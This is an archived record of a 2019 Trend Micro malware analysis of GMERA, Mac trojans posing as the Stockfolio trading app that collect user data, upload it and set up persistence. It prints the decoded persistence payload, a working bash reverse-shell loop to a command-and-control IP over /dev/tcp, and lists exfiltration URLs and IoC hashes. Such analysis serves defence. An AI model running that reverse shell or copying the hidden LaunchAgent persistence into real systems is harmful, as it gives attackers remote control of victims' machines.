{
	"id": "73e25fa3-89c4-4196-9a32-5808ba8ad1c1",
	"created_at": "2026-04-06T00:11:18.126039Z",
	"updated_at": "2026-04-10T13:13:09.375257Z",
	"deleted_at": null,
	"sha1_hash": "4ab70b673c1d9a2ad163734612da866db96ab46b",
	"title": "Mac Malware, Spoofs App, Steals User Information",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 83851,
	"plain_text": "Mac Malware, Spoofs App, Steals User Information\r\nBy By: Luis Magisa Sep 20, 2019 Read time: 5 min (1339 words)\r\nPublished: 2019-09-20 · Archived: 2026-04-05 17:13:04 UTC\r\nUnlike in the pre-internet era, when trading in the stock or commodities market involved a phone call to a broker — a move\r\nwhich often meant additional fees for would-be traders — the rise of trading apps placed the ability to trade in the hands of\r\nordinary users. However, their popularity has led to their abuse by cybercriminals who create fake trading apps as lures for\r\nunsuspecting victims to steal their personal data. We recently found and analyzed an example of such an app, which had a\r\nmalicious malware variant that disguised itself as a legitimate Mac-based trading app called Stockfolio.\r\nWe found two variants of the malware family. The first one contains a pair of shell scripts and connects to a remote site to\r\ndecrypt its encrypted codes while the second sample, despite using a simpler routine involving a single shell script, actually\r\nincorporates a persistence mechanism.\r\nSample 1: Trojan.MacOS.GMERA.A\r\nWe found the first sample (detected as Trojan.MacOS.GMERA.A) while checking suspicious shell scripts that were flagged\r\nby our machine learning system. At first glance, it was challenging to directly identify its malicious behavior because the\r\nshell script references other files such as AppCode, .pass and .app. To verify that the behavior was indeed malicious, we\r\nsourced the parent file using both our infrastructure and the aggregate website VirusTotal (which had the sample but lacked\r\ndetections from other major security vendors at the time of writing).\r\nintel\r\nFigure 1. The suspicious shell script which was flagged by our system\r\nThe initial sample we analyzed was a zip archive file (detected as Trojan.MacOS.GMERA.A) that contained an app bundle\r\n(Stockfoli.app) and a hidden encrypted file (.app). The fake app presents itself as legitimate to trick users, but we found that\r\nit contained several malicious components.\r\nintel\r\nFigure 2. Content of the zip file. Note that the app bundle is missing the “o” at the end, whereas the legitimate app is called\r\nStockfolio.\r\nThe zip file and its contents\r\nThe first suspicious component we found was an app bundle under the Resources directory, which seems to be a copy of the\r\nlegitimate Stockfolio version 1.4.13 but with the malware author’s digital certificate.\r\nComparing it to the Resources directory of the current version (1.5) found on the Stockfolio website revealed a number of\r\ndifferences, as shown in the figure below.\r\nintel\r\nintel\r\nFigure 3. Comparison of the app bundle folder structure between the malware variant (top) and the legitimate app (version\r\n1.5, bottom).\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/\r\nPage 1 of 5\n\nTechnical Analysis\r\nWhen the app is executed, an actual trading app interface will appear on-screen.  However, unbeknownst to the user, the\r\nmalware variant is already performing its malicious routines in the background.\r\nintel\r\nFigure 4. interface displayed when the malware app bundle is executed\r\nThe main Mach-O executable will launch the following bundled shell scripts in the Resources directory:\r\nplugin\r\nstock\r\nThe plugin and stock shell scripts\r\nThe plugin shell script collects the following information from the infected system:\r\nusername\r\nIP address\r\napps in /Applications\r\nfiles in ~/Documents\r\nfiles in ~/Desktop\r\nOS installation date\r\nfile system disk space usage\r\ngraphic/display information\r\nwireless network information\r\nscreenshots\r\nIt then encodes the collected information using base64 encoding and saves the collected information in a hidden file:\r\n/tmp/.info. It then uploads the file to hxxps://appstockfolio.com/panel/upload[.]php using the collected username and\r\nmachine serial number as identifiers.\r\nIf a successful response is sent from the URL, it will write the response in another hidden file ~/Library/Containers/.pass\r\nintel\r\nFigure 5 . The “plugin” script\r\nThe stock shell script will copy Stockfoli.app/Contents/Resources/appcode to /private/var/tmp/appcode. It then locates the\r\n.app file, which is the hidden file in the zip bundle that comes with Stockfoli.app\r\nintel\r\nFigure 6. The “stock” script\r\nIt decodes the b64-encoded .app file, executes it, then drops the following:\r\nFile Details\r\n/tmp/.hostname gmzera54l5qpa6lm.onion\r\n/tmp/.privatkey RSA private key\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/\r\nPage 2 of 5\n\nIt will delete the .app file then check if the file ~/Library/Containers/.pass exists. Using the contents of the ‘.pass’ file as the\r\nkey, the malware variant will decrypt /private/var/tmp/appcode, which is encrypted using AES-256-CBC. It then saves the\r\ndecrypted file to /tmp/appcode. Finally, it will execute the appcode. If it fails to do so, it will delete the /tmp/appcode file\r\nand ~/Library/Containers/.pass. Note that in the sample we analyzed, the decryption routine failed since the sample was not\r\nable to create ~/Library/Containers/.pass.\r\nintel\r\nFigure 7. Comparison of the code-signing information of the malicious app (top) and the legitimate Stockfolio app (bottom)\r\nWe suspect the file appcode is a malware file that contains additional routines. However, at the time of writing, we were\r\nunable to decrypt this file since the upload URL hxxps://appstockfolio.com/panel/upload[.]php was inaccessible (according\r\nto VirusTotal, the domain was active from January to February 2019). Furthermore, we suspect that the full malware routine\r\nuses the TOR network due to the presence of the unused address gmzera54l5qpa6lm[.]onion.\r\nSample 2: Trojan.MacOS.GMERA.B\r\nUsing the digital certificate of the first sample, we were able to find a second variant (detected as\r\nTrojan.MacOS.GMERA.B) that was uploaded to VirusTotal on June 2019. Like the first variant, it contains an embedded\r\ncopy of Stockfolio.app version 1.4.13 with the malware author’s digital certificate. It launches the app in a similar manner\r\nwhen executed to disguise its malicious intent.\r\nintel\r\nFigure 8. The bundle structure of Trojan.MacOS.GMERA.B\r\nOnce opened, Trojan.MacOS.GMERA.B will execute the embedded copy of Stockfolio version 1.4.13, after which it will\r\nlaunch the shell script run.sh\r\nThe script run.sh collects usernames and ip addresses from the infected machine via the following command:\r\nusername = ‘whoami’\r\nip address = 'curl -s ipecho.net/plain'\r\nIt connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the\r\nfollowing format:\r\nhxxp://owpqkszz[.]info/link.php?{username}\u0026{ip address}\r\nAs part of its routine, the malware also drops the following files:\r\nFile Details\r\n/private/tmp/.com.apple.upd.plist Copy of ~/Library/LaunchAgents/.com.apple.upd.plist\r\n~/Library/LaunchAgents/.com.apple.upd.plist Persistence mechanism\r\n/tmp/loglog Malware execution logs\r\nIt then creates a simple reverse shell to the C\u0026C server 193[.]37[.]212[.]176. Once connected, the malware author can run\r\nshell commands.\r\nintel\r\nFigure 9. Content of the run.sh shell script\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/\r\nPage 3 of 5\n\nOne of the primary changes found in the second variant, aside from the simplified routine, is the presence of a persistence\r\nmechanism via the creation of a property list (plist) file: ~/Library/LaunchAgents/.com.apple.upd.plist\r\nintel\r\nFigure 10. Hidden plist file used for persistence\r\nAfter we decoded the b64-encoded arguments for the plist file, we found the following code:\r\nwhile :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i\r\n\u003e/dev/tcp/193.37.212.176/25733 0\u003e\u00261'; done\r\nThis code instructs the plist file to constantly create the reverse shell mentioned earlier, occuring every 10,000 seconds. The\r\nsimple reverse shell created was observed to use the ports 25733-25736.\r\nConclusion\r\nGiven the changes we’ve seen from the malware variant’s initial iteration to its current one, we notice a trend in which the\r\nmalware authors have simplified its routine and added further capabilities. It’s possible that the people behind it are looking\r\nfor ways to make it more efficient – perhaps even adding evasion mechanisms in the future.\r\nIn the meantime, we advise aspiring traders to practice caution when it comes to the programs they download, especially if it\r\ncomes from an unknown or suspicious website. We recommend that users only download apps from official sources to\r\nminimize chances of downloading a malicious one. We reached out to Apple before publication of this entry, and they\r\ninformed us that the code signing certificate of this fake app's developers was revoked in July of this year.\r\nTrend Micro solutions\r\nEnd users can benefit from security solutions such as Trend Micro Home Security for Macproducts, which provides\r\ncomprehensive security and multi-device protection against cyberthreats.  Enterprises can benefit from Trend Micro’s Smart\r\nProtection Suitesproducts with XGen™ security, which infuses high-fidelity machine learning into a blend of threat\r\nprotection techniques to eliminate security gaps across any user activity and any endpoint.\r\nIndicators of Compromise (IoCs)\r\nSample 1\r\nFilename SHA256 Detection name\r\nplugin 6fe741ef057d38dd6d9bbe02dacbcb4940dac6c32e0f50a641e73727d6bf60d9 Trojan.SH.GMERA.A\r\nstock 6f48ef0d76ce68bbca53b05d2d22031aec5ce997e7227c3dcb20809959680f11 Trojan.SH.GMERA.A\r\nStockfoli efd5b96f489f934f2465a185e43fddf50fcde51b12a8fb91d5d93b09a21706c7 Trojan.MacOS.GMERA.A\r\nTrial_Stockfoli.zip 18e1db7c37a63d987a5448b4dd25103c8053799b0deea5f45f00ca094afe2fe7 Trojan.MacOS.GMERA.A\r\nSample 2\r\nFilename SHA256 Detection name\r\ncom.apple.upd.plist be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787 Trojan.MacOS.GMERA.B\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/\r\nPage 4 of 5\n\nrun.sh d50f5e94f2c417623c5f573963cc777c0676cc7245d65967ca09a53f464d2b50 Trojan.SH.GMERA.B\r\nStockfoli\r\n83df2f39140679a9cfb55f9c839ff8e7638ba29dba164900f9c77bb177796e03\r\n(sample 2)\r\nTrojan.MacOS.GMERA.B\r\nTrial_Stockfoli.zip\r\nfaa2799751582b8829c61cbfe2cbaf3e792960835884b61046778d17937520f4\r\n(sample 2)\r\nTrojan.MacOS.GMERA.B\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/"
	],
	"report_names": [
		"mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website"
	],
	"threat_actors": [],
	"ts_created_at": 1775434278,
	"ts_updated_at": 1775826789,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4ab70b673c1d9a2ad163734612da866db96ab46b.pdf",
		"text": "https://archive.orkl.eu/4ab70b673c1d9a2ad163734612da866db96ab46b.txt",
		"img": "https://archive.orkl.eu/4ab70b673c1d9a2ad163734612da866db96ab46b.jpg"
	}
}